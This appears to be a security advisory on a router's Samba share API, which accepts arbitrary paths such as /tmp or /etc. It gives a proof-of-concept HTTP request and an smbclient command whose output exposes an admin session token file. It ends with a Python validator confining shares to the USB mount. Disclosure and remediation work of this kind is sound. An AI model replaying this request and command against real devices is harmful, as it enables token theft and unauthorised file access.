Path Traversal
Through the file sharing feature, it is possible to share an arbitrary directory, such as /tmp or /etc, because there is no server-side filter restricting the share to the USB path.
Proof of Concept:
Request
POST /cgi-bin/api/files/samba/set HTTP/1.1
Host: 192.168.8.1
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: 75ab86c20b444a69918f6a523b5068f4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=75ab86c20b444a69918f6a523b5068f4
Connection: close

path=/tmp&lan_share=true&wan_share=false&writable=true
On the shell
smbclient //192.168.8.1/GL-Samba -U user% -c 'ls' | grep gl_token
WARNING: The "syslog" option is deprecated
gl_token_75ab86c20b444a69918f6a523b5068f4 N 2972 Sun Mar 19 07:55:31 2023
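
The server-side filter that the request above shows to be missing, as an added example (not the vendor's code): the requested path is resolved and accepted only if it lies inside the USB mount point. USB_ROOT and the function names are assumptions, and the directory tree in demo() is constructed.

```python
import os
import tempfile
from urllib.parse import parse_qs, urlencode

USB_ROOT = "/mnt/usb"  # assumption: placeholder for the device's USB mount point


def is_allowed_share_path(requested, allowed_root=USB_ROOT):
    """True only if `requested` resolves to allowed_root or a directory below it."""
    if not requested or "\x00" in requested or not os.path.isabs(requested):
        return False
    # Resolve "..", repeated slashes and symlinks before comparing.
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(requested)
    # commonpath compares whole components, so /mnt/usb2 does not match /mnt/usb.
    return os.path.commonpath([root, target]) == root and os.path.isdir(target)


def validate_samba_set(body, allowed_root=USB_ROOT):
    """Check the `path` field of a form-encoded files/samba/set request body."""
    paths = parse_qs(body, keep_blank_values=True).get("path", [])
    # Require exactly one `path` so duplicate parameters cannot be ambiguous.
    return len(paths) == 1 and is_allowed_share_path(paths[0], allowed_root)


def demo():
    """Run the check over a constructed directory tree standing in for the device."""
    with tempfile.TemporaryDirectory() as tmp:
        usb = os.path.join(tmp, "usb")
        os.makedirs(os.path.join(usb, "photos"))
        os.makedirs(os.path.join(tmp, "usb2"))         # sibling sharing the prefix
        os.symlink("/etc", os.path.join(usb, "link"))  # symlink leaving the root
        poc = "path=/tmp&lan_share=true&wan_share=false&writable=true"  # body from the PoC
        bodies = {
            "poc_tmp": poc,
            "usb_subdir": urlencode({"path": usb + "/photos", "lan_share": "true"}),
            "dotdot": urlencode({"path": usb + "/photos/../../usb2"}),
            "prefix_sibling": urlencode({"path": usb + "2"}),
            "symlink_out": urlencode({"path": usb + "/link"}),
            "duplicate": urlencode([("path", usb), ("path", "/etc")]),
        }
        return {name: validate_samba_set(b, usb) for name, b in bodies.items()}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:15} {'allow' if ok else 'reject'}")
```

The share configuration should be written with the resolved path rather than the raw request value, so the directory that was checked is the directory that gets exported.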